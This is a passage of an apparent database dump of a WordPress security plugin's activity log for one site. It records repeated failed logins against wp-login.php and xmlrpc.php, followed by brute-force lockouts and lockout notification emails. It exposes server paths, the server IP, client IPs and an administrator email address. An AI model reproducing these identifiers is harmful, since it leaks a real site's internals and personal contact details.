Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYlznkXpgmG5P@iB8kypQAAAJI\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"149.202.95.126\";s:11:\"REMOTE_PORT\";s:5:\"41052\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYlznkXpgmG5P@iB8kypQAAAJI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072590.6684\";s:12:\"REQUEST_TIME\";s:10:\"1569072590\";}}','notice','2019-09-21 13:29:52','2019-09-21 13:29:51',18313192,19607840,'https://bintara.com.my/wordpress/xmlrpc.php',1,0,'149.202.95.126'),(25941,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYmI3kXpgmG5P@iB8kyxwAAAJY\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"93.114.86.226\";s:11:\"REMOTE_PORT\";s:5:\"60642\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYmI3kXpgmG5P@iB8kyxwAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072675.7074\";s:12:\"REQUEST_TIME\";s:10:\"1569072675\";}}','notice','2019-09-21 13:31:17','2019-09-21 13:31:16',17803480,19288248,'https://bintara.com.my/wordpress/wp-login.php',1,0,'93.114.86.226'),(25942,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYmI3kXpgmG5P@iB8kyxwAAAJY\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"93.114.86.226\";s:11:\"REMOTE_PORT\";s:5:\"60642\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYmI3kXpgmG5P@iB8kyxwAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072675.7074\";s:12:\"REQUEST_TIME\";s:10:\"1569072675\";}}','notice','2019-09-21 13:31:18','2019-09-21 13:31:16',17965744,19288248,'https://bintara.com.my/wordpress/wp-login.php',1,0,'93.114.86.226'),(25943,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:31:16\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:31:16\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:46:16\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:46:16\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:31:18','2019-09-21 13:31:16',17999960,19288248,'https://bintara.com.my/wordpress/wp-login.php',1,0,'93.114.86.226'),(25944,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:31:18','2019-09-21 13:31:16',18205920,19288248,'https://bintara.com.my/wordpress/wp-login.php',1,0,'93.114.86.226'),(25945,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYmJ1iJ7D9Gn7wDPh8hkwAAAMQ\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"93.114.86.226\";s:11:\"REMOTE_PORT\";s:5:\"33278\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYmJ1iJ7D9Gn7wDPh8hkwAAAMQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072679.6694\";s:12:\"REQUEST_TIME\";s:10:\"1569072679\";}}','notice','2019-09-21 13:31:21','2019-09-21 13:31:20',18313088,19608288,'https://bintara.com.my/wordpress/xmlrpc.php',1,0,'93.114.86.226'),(25946,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYmLHkXpgmG5P@iB8ky2AAAAJI\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"103.5.150.16\";s:11:\"REMOTE_PORT\";s:5:\"36212\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYmLHkXpgmG5P@iB8ky2AAAAJI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072684.7084\";s:12:\"REQUEST_TIME\";s:10:\"1569072684\";}}','notice','2019-09-21 13:31:26','2019-09-21 13:31:25',17799872,19287072,'https://bintara.com.my/wp/wp-login.php',1,0,'103.5.150.16'),(25947,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:31:25\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:31:25\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:46:25\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:46:25\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:31:26','2019-09-21 13:31:25',17884432,19287072,'https://bintara.com.my/wp/wp-login.php',1,0,'103.5.150.16'),(25948,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:31:26','2019-09-21 13:31:25',18090408,19287072,'https://bintara.com.my/wp/wp-login.php',1,0,'103.5.150.16'),(25949,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/wp/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYmLjDrcQxTmGrCWuaRZgAAAc8\";s:12:\"REDIRECT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"103.5.150.16\";s:11:\"REMOTE_PORT\";s:5:\"36980\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYmLjDrcQxTmGrCWuaRZgAAAc8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072686.8552\";s:12:\"REQUEST_TIME\";s:10:\"1569072686\";}}','notice','2019-09-21 13:31:28','2019-09-21 13:31:27',18313400,19609040,'https://bintara.com.my/wp/xmlrpc.php',1,0,'103.5.150.16'),(25950,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYmNnkXpgmG5P@iB8ky7QAAAIk\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"67.212.233.12\";s:11:\"REMOTE_PORT\";s:5:\"49660\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYmNnkXpgmG5P@iB8ky7QAAAIk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569072695.049\";s:12:\"REQUEST_TIME\";s:10:\"1569072695\";}}','notice','2019-09-21 13:31:36','2019-09-21 13:31:35',17804992,19290856,'https://bintara.com.my/blog/wp-login.php',1,0,'67.212.233.12'),(25951,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:31:35\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:31:35\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:46:35\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:46:35\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:31:36','2019-09-21 13:31:35',17889864,19290856,'https://bintara.com.my/blog/wp-login.php',1,0,'67.212.233.12'),(25952,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:31:36','2019-09-21 13:31:35',18095952,19290856,'https://bintara.com.my/blog/wp-login.php',1,0,'67.212.233.12'),(25953,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 